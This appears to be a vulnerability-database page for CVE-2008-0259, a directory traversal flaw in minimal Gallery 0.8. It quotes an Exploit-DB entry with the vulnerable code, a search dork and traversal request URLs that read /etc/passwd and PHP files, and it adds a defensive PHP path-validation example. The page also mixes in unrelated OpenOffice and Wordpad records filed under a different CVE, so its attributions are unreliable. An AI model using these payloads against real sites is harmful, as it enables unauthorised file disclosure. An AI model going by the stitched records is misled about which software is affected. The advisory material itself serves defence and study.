CVE-2008-0259
published 2008-01-15
Priority P432 · medium · 6.4 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:N
EXPLOIT
EPSS: 2.26% (80.8th percentile)
Multiple directory traversal vulnerabilities in _mg/php/mg_thumbs.php in minimal Gallery 0.8 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) thumbcat and (2) thumb parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| minimal_design | minimal_gallery | — | — |
CVSS provenance
nvd · v2.0 · 6.4 · MEDIUM · AV:N/AC:L/Au:N/C:P/I:P/A:N
vendor_redhat · 9.3 · CRITICAL
GHSA
GHSA-9c9v-6xrr-w9cv: Multiple directory traversal vulnerabilities in _mg/php/mg_thumbs
ghsa_unreviewed·2022-05-01
CVE-2008-0259 [MEDIUM] CWE-22 GHSA-9c9v-6xrr-w9cv: Multiple directory traversal vulnerabilities in _mg/php/mg_thumbs
Red Hat
openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
vendor_redhat·2008-12-09·CVSS 9.3
CVE-2009-0259 [CRITICAL] openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
The Word processor in OpenOffice.org 1.1.2 through 1.1.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008, as demonstrated by 2008-crash.doc.rar, and a similar issue to CVE-2008-4841.
Statement: This issue can only result in an OpenOffice.org crash, not allowing arbitrary code execution. Red Hat does not consider a crash of a client application such as OpenOffice.org to be a security issue.
No detection rules found.
Exploit-DB
Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)
exploitdb·2008-09-25
CVE-2009-0259 Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)
---
MS Windows Wordpad .doc File Local Denial of Service PoC
author: securfrog
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6560.rar (2008-crash.doc.rar)
# milw0rm.com [2008-09-25]
Exploit-DB
minimal Gallery 0.8 - Remote File Disclosure
exploitdb·2008-01-13
CVE-2008-0260 minimal Gallery 0.8 - Remote File Disclosure
---
# Script : minimal Gallery 0.8
# Download : http://minimaldesign.net/downloads/projects/minimal-gallery
# BUG : Remote File Disclosure Vulnerability
# Dork : powered by minimal Gallery 0.8
## Vulnerable CODE :
~~~~~~~~~ /_mg/php/mg_thumbs.php ~~~~~~~~~~~~~~~~~
readfile("../$thumbs_dir/$thumbcat$thumb");
The variables thumbcat & thumb are defined in mg_thumbs.php like this:
$thumbcat = $_GET['thumbcat'];
$thumb = $_GET['thumb'];
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit :
[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumbcat=../../../../../../etc/passwd
[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumbcat=../../../../../../[file].php
[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumb=../../../..
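A hardened form of the readfile() path handling quoted above, as an added example that is not code from minimal Gallery or from the advisory: the requested path is canonicalised and must stay inside the thumbnail directory before anything is read. The function name resolve_thumb(), the extension allow-list and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
// Added example, not minimal Gallery code. resolve_thumb() is a hypothetical
// helper that replaces the direct use of thumbcat/thumb in a file path.
function resolve_thumb(string $baseDir, string $thumbcat, string $thumb): ?string
{
    // Reject NUL bytes before any filesystem call sees them.
    if (strpos($thumbcat . $thumb, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Same concatenation as the vulnerable line, then canonicalise so that
    // ".." segments and symlinks are resolved before the check.
    $real = realpath($base . DIRECTORY_SEPARATOR . $thumbcat . $thumb);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // The canonical path must sit under the base directory. The trailing
    // separator stops a sibling such as "thumbs_old" from matching "thumbs".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Assumed allow-list: a thumbnail endpoint only ever serves images.
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true) ? $real : null;
}

// Constructed demo tree: one thumbnail, and one file outside the thumbs dir.
$root = sys_get_temp_dir() . '/mg_demo_' . bin2hex(random_bytes(4));
mkdir("$root/thumbs/cat1", 0700, true);
file_put_contents("$root/thumbs/cat1/a.jpg", 'img');
file_put_contents("$root/secret.txt", 'secret');

$cases = [
    ['cat1/', 'a.jpg'],             // legitimate request
    ['../', 'secret.txt'],          // dot dot in thumbcat
    ['cat1/', '../../secret.txt'],  // dot dot in thumb
];
foreach ($cases as [$cat, $t]) {
    $path = resolve_thumb("$root/thumbs", $cat, $t);
    echo str_pad($cat . $t, 28), $path === null ? 'rejected' : 'served', "\n";
}
```

Only a path returned by the helper would be passed to readfile(); a null result should map to a 404 response.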
http://secunia.com/advisories/28391
http://www.securityfocus.com/bid/27265
https://exchange.xforce.ibmcloud.com/vulnerabilities/39649
https://www.exploit-db.com/exploits/4902